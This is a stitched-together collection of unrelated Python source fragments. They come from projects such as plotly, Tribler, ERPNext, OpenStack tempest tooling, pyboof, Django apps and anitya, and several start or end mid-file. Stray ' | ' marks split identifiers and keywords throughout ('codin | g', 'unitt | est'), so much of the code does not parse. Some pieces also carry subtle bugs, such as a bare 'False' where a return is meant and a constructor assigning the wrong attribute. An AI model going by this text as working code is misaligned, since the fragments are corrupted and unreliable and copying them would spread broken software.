arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scatter3d.marker.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scatter3d.marker.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
| # ----------------------------------
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("cauto", | None)
_v = cauto if cauto is not None else _v
if _v is not None:
self["cauto"] = _v
_v = arg.pop("cmax", None)
_v = cmax if cmax is not None else _v
if _v is not None:
self["cmax"] = _v
_v = arg.pop("cmid", None)
_v = cmid if cmid is not None else _v
if _v is not None:
self["cmid"] = _v
_v = arg.pop("cmin", None)
|
in the db.
@param fk_key: a foreign key from the Metadata table. Notice that
sqlite does not enforce the fk constraint. Be careful!
@param subtitles: a dictionary {lang : SubtitleInfo} (subtitle must be
an instance of SubtitleInfo)
@param commitNow: if False the transaction is not committed
"""
allSubtitles = self._getAllSubtitlesByKey(fk_key)
oldSubsSet = frozenset(allSubtitles.keys())
newSubsSet = frozenset(subtitles.keys())
commonLangs = oldSubsSet & newSubsSet
newLangs = newSubsSet - oldSubsSet
toDelete = oldSubsSet - newSubsSet
#update existing subtitles
for lang in commonLangs:
self._updateSubtitle(fk_key, subtitles[lang], False)
#remove subtitles that are no more in the set
for lang in toDelete:
self._deleteSubtitle(fk_key, lang, False)
#insert new subtitles
for lang in newLangs:
self._insertNewSubtitle(fk_key, subtitles[lang], False)
if commitNow:
self._db.commit()
def _updateSubtitle(self, metadata_fk, subtitle, commitNow=True):
"""
Update an entry in the Subtitles database.
If the entry identified by metadata_fk, subtitle.lang does not exist
in the subtitle database this method does nothing.
@param metadata_fk: foreign key of the metadata table
@param subtitle: instance of Subitle containing the data to insert
@param commitNow: if False, this method does not commit the changes to
the database
"""
assert metadata_fk is not None
assert subtitle is not None
assert isinstance(subtitle, SubtitleInfo)
toUpdate = self._getSubtitleByKey(metadata_fk, subtitle.lang)
if toUpdate is None:
return
query = QUERIES["UPDATE SUBTITLES"]
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (subtitle.path,
checksum, metadata_fk, subtitle.lang),
commitNow)
def updateSubtitlePath(self, channel, infohash, lang, newPath, commitNow=True):
"""
Updates a subtitle entry in the database if it exists.
Given the channel, the infohash, and a SubtitleInfo instance,
the entry relative to that subtitle is updated accordingly
to the details in the SubtitleInfo instance.
If an instance for the provided channel, infohash, and language
does not already exist in the db, nothing is done.
@param channel: the channel id (permid) of the channel for the
subtitle (binary)
@param infohash: the infohash of the item the subtitle refrs to
(binary)
@param lang: the language of the subtitle to update
@param path: the new path of the subtitle. None to indicate that the
subtitle is not available
@return True if an entry was updated in the db. False if nothing
got written on the db
@precondition: subtitle.lang is not None
"""
query = QUERIES["SELECT SUBS JOIN HASH ONE"]
channel = bin2str(channel)
infohash = bin2str(infohash)
res = self._db.fetchall(query, (infohash, channel, lang))
if len(res) > 1 :
raise MetadataDBException("Metadata DB constraint violated")
elif len(res) == 0 :
if DEBUG:
print >> sys.stderr, "Nothing to update for channel %s, infohash %s, lang"\
" %s. Doing nothing." % (channel[-10:],\
infohash, lang)
return False
else:
query = QUERIES["UPDATE SUBTITLES"]
self._db.execute_write(query, (newPath,
res[0][3], res[0][0], lang),
commitNow)
return True
def _deleteSubtitle(self, metadata_fk, lang, commitNow=True):
"""
Delete an entry from the subtitles table.
Given a foreign key from the metadata table and a language delets
the corresponding entry in the subtitle table. If the entry
is not found, it does nothing.
@param metadata_fk: a foreign key from the Metadata table
@param lang: a 3 characters language code
@param commitNow: if False does not commit the transaction
"""
assert metadata_fk is not None
assert lang is not None
query = QUERIES["DELETE ONE SUBTITLES"]
self._db.execute_write(query, (metadata_fk, lang), commitNow)
def _insertNewSubtitle(self, metadata_fk, subtitle, commitNow=True) :
"""
Insert a new subtitle entry in the Subtitles table.
Given a foreign key from the Metadata table, and a SubtitleInfo instance
describing the subtitle to insert, adds it to the metadata table.
This method assumes that that entry does not already exist in the
table.
NOTICE that sqlite does not enforce the foreign key constraint,
so be careful about integrity
"""
assert metadata_fk is not None
assert subtitle is not | None
assert isinstance(subtitle, SubtitleInfo)
query = QUERIES["INSERT SUBTITLES"]
checksum = bin2str(subtitle.checksum)
self._db.execute_write(query, (metadata_fk, subtitle.lang,
subtitle.path, checksum),
commitNow)
def deleteMetadata(self, channel, infohash):
"""
Removes all the metadata associated to a | channel/infohash.
Everything is dropped from both the Metadata and Subtitles db.
@param channel: the permid of the channel's owner
@param infohash: the infhoash of the entry
"""
assert channel is not None
assert infohash is not None
channel = bin2str(channel)
infohash = bin2str(infohash)
query = QUERIES["SELECT METADATA"]
if DEBUG:
print >> sys.stderr, "Performing query on db: " + query
res = self._db.fetchall(query, (infohash, channel))
if len(res) == 0 :
return
if len(res) > 1 :
raise IOError("Metadata DB constraint violated")
metadata_fk = res[0][0]
self._deleteAllSubtitles(metadata_fk, False)
query = QUERIES["DELETE METADATA PK"]
self._db.execute_write(query, (metadata_fk,), False)
self._db.commit()
def _deleteAllSubtitles(self, metadata_fk, commitNow):
query = QUERIES["DELETE ALL SUBTITLES"]
self._db.execute_write(query, (metadata_fk,), commitNow)
def getAllLocalSubtitles(self):
'''
Returns a structure containing all the subtitleInfos that are pointing
to a local path
@return a dictionary like this:
{ ...
channel1 : { infohash1 : [ SubtitleInfo1, ...] }
...
}
'''
query = QUERIES["SELECT SUBTITLES WITH PATH"]
res = self._db.fetchall(query)
result = {}
for entry in res:
# fk = entry[0]
path = entry[1]
lang = entry[2]
checksum = str2bin(entry[3])
channel = str2bin(entry[4])
infohash = str2bin(entry[5])
s = SubtitleInfo(lang, path, checksum)
|
# -*- codin | g: utf-8 -*-
import unittest
import trytond.tests.test_tryton
from test_invoice import TestInvoice
def suite():
"""
Define suite
"""
test_suite = trytond.tests.test_tryton.suite()
test_suite.addTests([
unittest.TestLoader().loadTestsFromTestCase(TestInvoice),
])
return test_suite
if __name__ == '__main__':
unitt | est.TextTestRunner(verbosity=2).run(suite())
|
t_voucher' : self.name,
'account' : party_account,
'party_type': party_type,
'party': party,
'is_advance' : 'Yes',
'dr_or_cr' : dr_or_cr,
'unadjusted_amount' : flt(d.advance_amount),
'allocated_amount' : flt(d.allocated_amount),
'exchange_rate': (self.conversion_rate
if self.party_account_currency != self.company_currency else 1),
'grand_total': (self.base_grand_total
if self.party_account_currency==self.company_currency else self.grand_total),
'outstanding_amount': self.outstanding_amount
})
lst.append(args)
if lst:
from erpnext.accounts.utils import reconcile_against_document
reconcile_against_document(lst)
def validate_multiple_billing(self, ref_dt, item_ref_dn, based_on, parentfield):
from erpnext.controllers.status_updater import get_tolerance_for
item_tolerance = {}
global_tolerance = None
for item in self.get("items"):
if item.get(item_ref_dn):
ref_amt = flt(frappe.db.get_value(ref_dt + " Item",
item.get(item_ref_dn), based_on), self.precision(based_on, item))
if not ref_amt:
frappe.msgprint(_("Warning: System will not check overbilling since amount for Item {0} in {1} is zero").format(item.item_code, ref_dt))
else:
already_billed = frappe.db.sql("""select sum(%s) from `tab%s`
where %s=%s and docstatus=1 and parent != %s""" %
(based_on, self.doctype + " Item", item_ref_dn, '%s', '%s'),
(item.get(item_ref_dn), self.name))[0][0]
total_billed_amt = flt(flt(already_billed) + flt(item.get(based_on)),
self.precision(based_on, item))
tolerance, item_tolerance, global_tolerance = get_tolerance_for(item.item_code,
item_tolerance, global_tolerance)
max_allowed_amt = flt(ref_amt * (100 + tolerance) / 100)
if total_billed_amt - max_allowed_amt > 0.01:
frappe.throw(_("Cannot overbill for Item {0} in row {1} more than {2}. To allow over-billing, please set in Buying Settings").format(item.item_code, item.idx, max_allowed_amt))
def get_company_default(self, fieldname):
from erpnext.accounts.utils import get_company_default
return get_company_default(self.company, fieldname)
def get_stock_items(self):
stock_items = []
item_codes = list(set(item.item_code for item in self.get("items")))
if item_codes:
stock_items = [r[0] for r in frappe.db.sql("""select name
from `tabItem` where name in (%s) and is_stock_item=1""" % \
(", ".join((["%s"]*len(item_codes))),), item_codes)]
return stock_items
def set_total_advance_paid(self):
if self.doctype == "Sales Order":
dr_or_cr = "credit_in_account_currency"
party = self.customer
else:
dr_or_cr = "debit_in_account_currency"
party = self.supplier
advance = frappe.db.sql("""
select
account_currency, sum({dr_or_cr}) as amount
from
`tabGL Entry`
where
against_voucher_type = %s and against_voucher = %s and party=%s
and docstatus = 1
""".format(dr_or_cr=dr_or_cr), (self.doctype, self.name, party), as_dict=1)
if advance:
advance = advance[0]
advance_paid = flt(advance.amount, self.precision("advance_paid"))
formatted_advance_paid = fmt_money(advance_paid, precision=self.precision("advance_paid"),
currency=advance.account_currency)
frappe.db.set_value(self.doctype, self.name, "party_account_currency",
advance.account_currency)
if advance.account_currency == self.currency:
order_total = self.grand_total
formatted_order_total = fmt_money(order_total, precision=self.precision("grand_total"),
currency=advance.account_currency)
else:
order_total = self.base_grand_total
formatted_order_total = fmt_money(order_total, precision=self.precision("base_grand_total"),
currency=advance.account_currency)
if self.currency == self.company_currency and advance_paid > order_total:
frappe.throw(_("Total advance ({0}) against Order {1} cannot be greater than the Grand Total ({2})")
.format(formatted_advance_paid, self.name, formatted_order_total))
frappe.db.set_value(self.doctype, self.name, "advance_paid", advance_paid)
@property
def company_abbr(self):
if not hasattr(self, "_abbr"):
self._abbr = frappe.db.get_value("Company", self.company, "abbr")
return self._abbr
def validate_party(self):
party_type, party = self.get_party()
validate_party_frozen_disabled(party_type, party)
def get_party(self):
party_type = None
if self.doctype in ("Opportunity", "Quotation", "Sales Order", "Delivery Note", "Sales Invoice"):
party_type = 'Customer'
elif self.doctype in ("Supplier Quotation", "Purchase Order", "Purchase Receipt", "Purchase Invoice"):
party_type = 'Supplier'
elif self.meta.get_field("customer"):
party_type = "Customer"
elif self.meta.get_field("supplier"):
party_type = "Supplier"
party = self.get(party_type.lower()) if party_type else None
return party_type, party
def validate_currency(self):
if self.get("currency"):
party_type, party = self.get_party()
if party_type and party:
party_account_currency = get_party_account_currency(party_type, party, self.company)
if (party_account_currency
and party_account_currency != self.company_currency
and self.currency != party_account_currency):
frappe.throw(_("Accounting Entry for {0}: {1} can only be made in currency: {2}")
.format(party_type, party, party_account_currency), InvalidCurrency)
# Note: not validating with gle account because we don't have the account
# at quotation / sales order level and we shouldn't stop someone
# from creating a sales invoice if sales order is already created
def validate_fixed_asset(self):
for d in self.get("items"):
if d.is_fixed_asset:
if d.qty > 1:
frappe.throw(_("Row #{0}: Qty must be 1, as item is a fixed asset. Please use separate row for multiple qty.").format(d.idx))
if d.meta.get_field("asset"):
if not d.asset:
frappe.throw(_("Row #{0}: Asset is mandatory for fixed asset purchase/sale")
.format(d.idx))
else:
asset = frappe.get_doc("Asset", d.asset)
if asset.company != self.company:
frappe.throw(_("Row #{0}: Asset {1} does not belong to company {2}")
.format(d.idx, d.asset, self.company))
elif asset.item_code != d.item_code:
frappe.throw(_("Row #{0}: Asset {1} does not linked to Item {2}")
.format(d.idx, d.asset, d.item_code))
elif asset.docstatus != 1:
frappe.throw(_("Row #{0}: Asset {1} must be submitted").format(d.idx, d.asset))
elif self.doctype == "Purchase Invoice":
if asset.status != "Submitted":
frappe.throw(_("Row #{0}: Asset {1} is already {2}")
.format(d.idx, d.asset, asset.status))
elif getdate(asset.purchase_date) != getdate(self.posting_date):
frappe.throw(_("Row #{0}: Posting Date must be same as purch | ase date {1} of asset {2}").format(d.idx, asset.purchase_date, d.asset | ))
elif asset.is_existing_asset:
frappe.throw(_("Row #{0}: Purchase Invoice cannot be made against an existing asset {1}").format(d.idx, d.asset))
elif self.docstatus=="Sales Invoice" and self.docstatus == 1:
if self.update_stock:
frappe.throw(_("'Update Stock' cannot be checked for fixed asset sale"))
elif asset.status in ("Scrapped", "Cancelled", "Sold"):
frappe.throw(_("Row #{0}: Asset {1} cannot be submitted, it is already {2}")
.format(d.idx, d.asset, asset.status))
def delink_advance_entries(self, linked_doc_name):
total_allocated_amount = 0
for adv in self.advances:
consider_for_total_advance = True
if adv.reference_name == linked_doc_name:
frappe.db.sql("""delete from `tab{0} Advance`
where name = %s""".format(self.doctype), adv.name)
consider_for_total_advance = False
if consider_for_total_advance:
total_allocated_amount += flt(adv.allocated_amount, adv.precision("allocated_amount"))
frappe.db.set_value(self.doctype, self.name, "total_advance",
total_allocated_amount, update_modified=False)
def group_similar_items(self):
group_item_qty = {}
group_item_amount = {}
for |
# # ===============================================================================
# # Copyright 2015 Jake Ross
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors.api import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# | title='New Branch Name',
# width=300,
# kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBranchView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# | VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
|
from rtree import index
import numpy as np
#from shapely.prepared import prep
import shapely
def polygon2points(p):
"""
convert a polygon to a sequence of points for DS documents
:param p: shapely.geometry.Polygon
returns a string representing the set of points
"""
return ",".join(list("%s,%s"%(x,y) for x,y in p.exterior.coords))
def sPoints2tuplePoints(s):
"""
convert a string (from DSxml) to a polygon
:param s: string = 'x,y x,y...'
returns a Geometry
"""
# lList = s.split(',')
# return [(float(x),float(y)) for x,y in zip(lList[0::2],lList[1::2])]
return [ (float(x),float(y)) for sxy in s.split(' ') for (x,y) in sxy.split(',') ]
def iuo(z1,z2):
"""
intersection over union
:param z1: polygon
:param z2: polygon
returns z1.intersection(z2) / z1.union(z2)
"""
assert z1.isvalid
assert z2.isvalid
return z1.intersection(z2) / z1.union(z2)
def populateGeo(lZones:list(),lElements:list()):
"""
affect lElements i to lZones using argmax(overlap(elt,zone)
"""
lIndElements = index.Index()
dPopulated = {}
for pos, z in enumerate(lZones):
# lIndElements.insert(pos, cell.toPo | lygon().bounds)
# print (cell,cell.is_valid,cell.bounds)
lIndElements.insert(pos, z.bounds)
aIntersection = np.zeros((len(lElements),len(lZones)),dtype=float)
for j,elt in enumerate(lElements):
ll = lIndElements.intersection(elt.bounds)
for x in ll:
try:aIntersection[j][x] = elt.intersection(lZones[x]).area
except shapely.errors.Topo | logicalError: pass #This operation could not be performed. Reason: unknown
for i,e in enumerate(lElements):
best = np.argmax(aIntersection[i])
# aIntersection == np.zeros : empty
if aIntersection[i][best]>0:
try: dPopulated[best].append(i)
except KeyError:dPopulated[best] = [i]
return dPopulated
if __name__ == "__main__":
# def test_geo():
from shapely.geometry import Polygon
lP= []
for i in range(0,100,10):
lP.append(Polygon(((i,i),(i,i+10),(i+10,i+10),(i+10,i))))
# print (lP[-1])
lE= []
for i in range(0,100,5):
lE.append(Polygon(((i,i),(i,i+9),(i+9,i+9),(i+9,i))))
# print (lE[-1])
dres = populateGeo(lP,lE)
for item in dres:
print (lE[item],[lE[x].wkt for x in dres[item]])
# print(polygon2points(lP[0]))
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from categories.models import Category
class TestCategoryAdmin(TestCase):
def setUp(self):
self.client = Client()
def test_adding_parent_and_child(self):
User.objects.create_superuser('testuser', 'testuser@example.com', 'password')
self.client.login(username='testuser', password='password')
url = reverse('admin:categories_category_add')
data = {
'parent': '',
'name': "Parent",
'thumbnail': '',
'filename': '',
'active': 'on',
'alternate_title': '',
'alternate_url': '',
'description': '',
'meta_keywords': '',
'meta_extra': '',
'order': 0,
'slug': 'parent',
'_save': '_save',
}
resp = self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# update parent
data.update({'name': 'Parent (Changed)'})
resp = self.client.post(reverse('admin:categories_category_change', args=(1,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# add a child
data.update({
'parent': '1',
'name': 'Child',
'slug': 'child',
})
resp = | self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
# update child
data.update({'name': 'Child (Changed)'})
| resp = self.client.post(reverse('admin:categories_category_change', args=(2,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
|
"""Base material for signature backends."""
from django.urls import reverse
class SignatureBackend(object):
"""Encapsulate signature workflow and integration with vendor backend.
Here is a typical workflow:
* :class:`~django_anysign.models.SignatureType` instance is created. It
encapsulates the backend type and its configuration.
* A :class:`~django_anysign.models.Signature` instance is created.
The signature instance has a signature type attribute, hence a backend.
* Signers are notified, by email, text or whatever. They get an hyperlink
to the "signer view". The URL may vary depending on the signature
backend.
* A signer goes to the backend's "signer view" entry point: typically a
view that integrates backend specific form to sign a document.
* Most backends have a "notification view", for the third-party service to
signal updates.
* Most backends have a "signer return view", where the signer is redirected
when he ends the signature process (whatever signature status).
* The backend's specific workflow can be made of several views. At the
beginning, there is a Signature instance which carries data (typically a
document). At the end, Signature is done.
"""
def __init__(self, name, code, url_namespace='anysign', **kwargs):
"""Configure backend."""
#: Human-readable name.
self.name = name
#: Machine-readable name. Should be lowercase alphanumeric only, i.e.
#: PEP-8 compliant.
self.code = code
#: Namespace for URL resolution.
self.url_namespace = url_namespace
def send_signature(self, signature):
"""Initiate the signature process.
At this state, the signature object has been configured.
Typical implementation consists in sending signer URL to first signer.
Raise ``NotImplementedError`` if the backend does not support such a
feature.
"""
raise NotImplementedError()
def get_signer_url(self, signer):
"""Return URL where signer signs document.
Raise ``NotImplementedError`` in case the backend does not support
"signer view" feature.
Default implementation reverses :meth:`get_signer_url_name` with
``signer.pk`` as argument.
"""
return reverse(self.get_signer_url_name(), args=[signer.pk])
def get_signer_url_name(self):
"""Return URL name where signer signs document.
Raise ``NotImplementedError`` in case the backend does not support
"signer view" feature.
Default implementation returns ``anysign:signer``.
"""
return '{ns}:signer'.format(ns=self.url_namespace)
def get_signer_return_url(self, signer):
"""Return absolute URL where signer is redirected after signing.
The URL must be **absolute** because it is typically used by external
signature service: the signer uses external web UI to sign the
document(s) and then the signature service redirects the signer to
(this) `Django` website.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation reverses :meth:`ge | t_signer_return_url_name`
with ``signer.pk`` as argument.
"""
return reverse(
self.get_signer_return_url_name(),
args=[signer.pk])
def get_signer_return_u | rl_name(self):
"""Return URL name where signer is redirected once document has been
signed.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signer_return``.
"""
return '{ns}:signer_return'.format(ns=self.url_namespace)
def get_signature_callback_url(self, signature):
"""Return URL where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signature callback url" feature.
Default implementation reverses :meth:`get_signature_callback_url_name`
with ``signature.pk`` as argument.
"""
return reverse(
self.get_signature_callback_url_name(),
args=[signature.pk])
def get_signature_callback_url_name(self):
"""Return URL name where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signature_callback``.
"""
return '{ns}:signature_callback'.format(ns=self.url_namespace)
def create_signature(self, signature):
"""Register ``signature`` in backend, return updated object.
This method is typically called by views which create
:class:`~django_anysign.models.Signature` instances.
If backend stores a signature object, then implementation should update
:attr:`~django_anysign.models.Signature.signature_backend_id`.
Base implementation does nothing: override this method in backends.
"""
return signature
|
#! /usr/bin/env python
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This script is intended to be run as part of a periodic proposal bot
# job in OpenStack infrastructure.
#
# In order to function correctly, the environment in which the
# script runs must have
# * network access to the review.opendev.org Gerrit API
# working directory
# * network access to https://opendev.org/openstack
import json
import re
import sys
import urllib3
from urllib3.util import retry
# List of projects having tempest plugin stale or unmaintained for a long time
# (6 months or more)
# TODO(masayukig): Some of these can be removed from BLACKLIST in the future
# when the patches are merged.
BLACKLIST = [
'x/gce-api', # It looks gce-api doesn't support python3 yet.
'x/glare', # To avoid sanity-job failure
'x/group-based-policy', # It looks this doesn't support python3 yet.
'x/intel-nfv-ci-tests', # https://review.opendev.org/#/c/634640/
'op | enstack/networking-generic-switch',
# https://review.opendev.org/#/c/634846/
'openstack/networking-l2gw-tempest-plugin',
# https://review.opendev.org/#/c/635093/
'openstack/networking-midonet', # https://review.opendev.org/#/c/635096/
'x/networking-plumgrid', # https://review.opendev.org/#/c/635096/
'x/networking-spp', # https://review.opendev.org/#/c/635098/
'openstack/neutron-dynamic-routing',
# https://review.opendev.org/#/c/637718/
'o | penstack/neutron-vpnaas', # https://review.opendev.org/#/c/637719/
'x/tap-as-a-service', # To avoid sanity-job failure
'x/valet', # https://review.opendev.org/#/c/638339/
'x/kingbird', # https://bugs.launchpad.net/kingbird/+bug/1869722
# vmware-nsx is blacklisted since https://review.opendev.org/#/c/736952
'x/vmware-nsx-tempest-plugin',
]
url = 'https://review.opendev.org/projects/'
# This is what a project looks like
'''
"openstack-attic/akanda": {
"id": "openstack-attic%2Fakanda",
"state": "READ_ONLY"
},
'''
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
retries = retry.Retry(status_forcelist=[500], backoff_factor=1.0)
def has_tempest_plugin(proj):
try:
r = http.request('GET', "https://opendev.org/%s/raw/branch/"
"master/setup.cfg" % proj, retries=retries)
if r.status == 404:
return False
except urllib3.exceptions.MaxRetryError as err:
# We should not ignore non 404 errors.
raise err
p = re.compile(r'^tempest\.test_plugins', re.M)
if p.findall(r.data.decode('utf-8')):
return True
else:
False
if len(sys.argv) > 1 and sys.argv[1] == 'blacklist':
for black_plugin in BLACKLIST:
print(black_plugin)
# We just need BLACKLIST when we use this `blacklist` option.
# So, this exits here.
sys.exit()
r = http.request('GET', url, retries=retries)
# Gerrit prepends 4 garbage octets to the JSON, in order to counter
# cross-site scripting attacks. Therefore we must discard it so the
# json library won't choke.
content = r.data.decode('utf-8')[4:]
projects = sorted(json.loads(content))
# Retrieve projects having no deployment tool repo (such as deb,
# puppet, ansible, etc.), infra repos, ui or spec namespace as those
# namespaces do not contains tempest plugins.
projects_list = [i for i in projects if not (
i.startswith('openstack-dev/') or
i.startswith('openstack-infra/') or
i.startswith('openstack/ansible-') or
i.startswith('openstack/charm-') or
i.startswith('openstack/cookbook-openstack-') or
i.startswith('openstack/devstack-') or
i.startswith('openstack/fuel-') or
i.startswith('openstack/deb-') or
i.startswith('openstack/puppet-') or
i.startswith('openstack/openstack-ansible-') or
i.startswith('x/deb-') or
i.startswith('x/fuel-') or
i.startswith('x/python-') or
i.startswith('zuul/') or
i.endswith('-ui') or
i.endswith('-specs'))]
found_plugins = list(filter(has_tempest_plugin, projects_list))
# We have tempest plugins not only in 'openstack/' namespace but also the
# other name spaces such as 'airship/', 'x/', etc.
# So, we print all of them here.
for project in found_plugins:
print(project)
|
#!/usr/bin/env python3
import glob
import numpy as np
import pyboof as pb
# Scene recognition is defined here as the problem where you wish to find multiple views of the same scene
# In this example we will load a set of images that has sets of 3 related images. We will tell it to find the 5
# most similar images so that you can see what it does when it fails to find a good match
# Get a list of all images which we wish to search
list_images = list(glob.glob("../data/example/recognition/scene/*.jpg"))
list_images.sort()
# Create an instance of SceneRecognition. This will take in images as input
recognizer = pb.FactorySceneRecognition(np.uint8).scene_recognition()
# First we need to create a model so that it knows how to describe a model. BoofCV does provide a
# pre-build model generated from vacation photos. This is fast enough that often its just easier to train it
# on the images you plan to search.
print("Learning the model. This can take a moment or two.")
recognizer.learn_model(list_images)
# Alternatively you can comment out the code above (lines 18 to 24) and load
# a pre-build model by uncommenting the line below
# recognizer = pb.download_default_scene_recognition(np.uint8, "saved_models")
# Now add all the images that we wish to look up
print("Adding images to the database")
for image_file in list_images:
boof_gray = pb.load_sing | le_band(image_file, np.uint8)
recognizer.add_image(image_file, boof_gray)
# Let's look one up and see which images are related
print("Making a query: ", list_images[6])
query_image = pb.load_single_band(list_images[6], np.uint8)
found_matches = recognizer.query(query_image, 5)
# We are expecting 3 matches to be first, then other two will be incorrect/nois | e
print("len={}".format(len(found_matches)))
print("\nResults:")
for m in found_matches:
print("{:s} error={:f}".format(m["id"], m["error"]))
# Display the results
image_list = [(query_image, "Query")]
for m in found_matches:
image_list.append((pb.load_planar(m["id"], np.uint8), m["id"]))
pb.swing.show_list(image_list, title="Query Results")
input("Press any key to exit")
|
from app | import db
from sqlalchemy.dialects.postgresql import JSON
class ChBible(db.Model):
__tablename__ = 'chbible'
id = db.Column(db.Integer, primary_key=True)
bbid = db.Column(db.String())
snt = db.Column(db.String())
snt_lg = db.Column(db.String())
snt_sdg = db.Column(db.String())
def __init__(self, bbid, snt, snt_lg, snt_sdg):
self.url = bbid
self.snt = snt
self.snt_lg = snt_lg
self.snt_sdg = snt_sdg
| def __repr__(self):
return '<id {0}> <{1}> {2}\n'.format(self.id, self.bbid, self.snt)
|
#!/usr/bin/env p | ython
# -*- coding: utf-8 -*-
from flask import Blueprint
main = Blueprint('main', __n | ame__)
from . import views, errors
|
# coding=utf-8
# -------------------------------------------------------------- | ------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if t | he code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestresourceflatteningtestservice"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.2.0", "msrestazure>=0.2.1"]
setup(
name=NAME,
version=VERSION,
description="AutoRestResourceFlatteningTestService",
author_email="",
url="",
keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Resource Flattening for AutoRest
"""
)
|
# hgversion.py - Version information for Mercurial
#
# Copyright 2009 Steve Borho <steve@borho.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2, incorporated herein by reference.
import re
try:
# post 1.1.2
from mercurial import util
hgversion = util.version()
except AttributeError:
# <= 1.1.2
from mercurial import version
hgversion = version.get_version()
testedwith = '3.6 3.7'
def checkhgversion(v):
"""range check the Mercurial version"""
reqvers = testedwith.split()
v = v. | split('+')[0]
if not v or v == 'unknown' or len(v) >= 12:
# can't make any intelligent decisions about unknown or hashes
return
vers = re.split(r'\.|-', v)[:2]
if len(vers) < 2:
return
if '.'.join(vers) in reqvers:
return
| return ('This version of TortoiseHg requires Mercurial version %s.n to '
'%s.n, but found %s') % (reqvers[0], reqvers[-1], v)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE.TXT file)
from django.conf.urls import patterns, include, url
from apps.common.urls import arg_id, arg_slug, arg_username
L = arg_id("link_id")
U = arg_ | username("username")
urlpatterns = patterns("apps.account.views",
url(r"^account/profile$", "profile"),
url(r"^account/view/%s$" % U, "view"),
url(r"^account/set_passport$", "set_passport", { "wizard" : False }),
url(r"^account/edit$", "edit", { "wizard" : False }),
| url(r"^account/link/create$", "link_create"),
url(r"^account/link/delete/%s$" % L, "link_delete"),
# this url because allauth
url(r"^accounts/profile/$", "edit", { "wizard" : True }),
url(r"^account/wiz/passport", "set_passport", { "wizard" : True }),
)
|
# -*- coding: utf-8 -*-
"""
Cuttle, the simple, extendable ORM.
:lic | ense: MIT, see LIC | ENSE for details.
"""
__version__ = '0.9.0.dev'
|
klin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
"""
anitya tests for the custom backend.
"""
import unittest
import mock
import anitya.lib.backends.npmjs as backend
from anitya.db import models
from anitya.lib.exceptions import AnityaPluginException
from anitya.tests.base import DatabaseTestCase, create_distro
BACKEND = "npmjs"
class NpmjsBackendtests(DatabaseTestCase):
"""Drupal backend tests."""
def setUp(self):
"""Set up the environnment, ran before every tests."""
super(NpmjsBackendtests, self).setUp()
